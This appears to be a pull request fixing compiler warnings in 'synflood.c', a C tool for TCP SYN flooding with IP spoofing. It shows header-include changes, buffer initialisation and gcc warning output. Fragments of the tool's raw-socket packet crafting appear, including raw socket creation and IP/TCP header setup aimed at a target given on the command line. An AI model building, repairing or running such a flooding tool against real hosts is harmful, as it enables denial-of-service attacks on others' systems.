### PR TITLE
#include nitpicking

### DIFF
--- a/synflood.c
+++ b/synflood.c
@@ -1,4 +1,5 @@
-
+#include        <stdlib.h>
+#include        <string.h>
 #include	<sys/socket.h>	/* basic socket definitions */
 #include	<netinet/in.h>	/* sockaddr_in{} and other Internet defns */
 #include	<stdio.h>
@@ -96,7 +97,7 @@ int main(int argc, char *argv[])
 	int	sockfd;
 	if((sockfd = socket(PF_INET,SOCK_RAW,IPPROTO_TCP)) < 0)
 			printf("create socket error\n");
-	char datagram[1024],*pseudogram;
+	char datagram[1024] = {}, *pseudogram;
 
 	struct ipheader *iph=datagram;
 	struct tcpheader *tcph=datagram + sizeof(struct ipheader);
@@ -115,7 +116,6 @@ int main(int argc, char *argv[])
 	sin.sin_port=htons(destIP_Port); //convert from host byte order to network byte order
 	sin.sin_addr.s_addr=inet_addr(argv[2]);
 
-	memset(datagram,0,1024);
 	iph->iph_ihl=5;
 	iph->iph_ver=4;
 	iph->iph_tos=0;


### PR DESCRIPTION
compiling with gcc 8.3 yielded

root@devdb:/temp/troll/TCP_Flooding_IP_SPoofing# gcc synflood.c
synflood.c: In function ‘main’:
synflood.c:101:23: warning: initialization of ‘struct ipheader *’ from incompatible pointer type ‘char *’ [-Wincompatible-pointer-types]
  struct ipheader *iph=datagram;
                       ^~~~~~~~
synflood.c:102:25: warning: initialization of ‘struct tcpheader *’ from incompatible pointer type ‘char *’ [-Wincompatible-pointer-types]
  struct tcpheader *tcph=datagram + sizeof(struct ipheader);
                         ^~~~~~~~
synflood.c:109:3: warning: implicit declaration of function ‘exit’ [-Wimplicit-function-declaration]
   exit(-1);
   ^~~~
synflood.c:109:3: warning: incompatible implicit declaration of built-in function ‘exit’
synflood.c:109:3: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’
synflood.c:9:1:
+#include <stdlib.h>

synflood.c:109:3:
   exit(-1);
   ^~~~
synflood.c:112:27: warning: implicit declaration of function ‘atoi’ [-Wimplicit-function-declaration]
  unsigned int destIP_Port=atoi(argv[3]);
                           ^~~~
synflood.c:118:2: warning: implicit declaration of function ‘memset’ [-Wimplicit-function-declaration]
  memset(datagram,0,1024);
  ^~~~~~
synflood.c:118:2: warning: incompatible implicit declaration of built-in function ‘memset’
synflood.c:118:2: note: include ‘<string.h>’ or provide a declaration of ‘memset’
synflood.c:9:1:
+#include <string.h>

synflood.c:118:2:
  memset(datagram,0,1024);
  ^~~~~~
synflood.c:161:16: warning: implicit declaration of function ‘malloc’ [-Wimplicit-function-declaration]
   pseudogram = malloc(psize);
                ^~~~~~
synflood.c:161:16: warning: incompatible implicit declaration of built-in function ‘malloc’
synflood.c:161:16: note: include ‘<stdlib.h>’ or provide a declaration of ‘malloc’
synflood.c:163:3: warning: implicit declaration of function ‘memcpy’ [-Wimplicit-function-declaration]
   memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
   ^~~~~~
synflood.c:163:3: warning: incompatible implicit declaration of built-in function ‘memcpy’
synflood.c:163:3: note: include ‘<string.h>’ or provide a declaration of ‘memcpy’
synflood.c:181:2: warning: incompatible implicit declaration of built-in function ‘exit’
  exit(-1);
  ^~~~
synflood.c:181:2: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’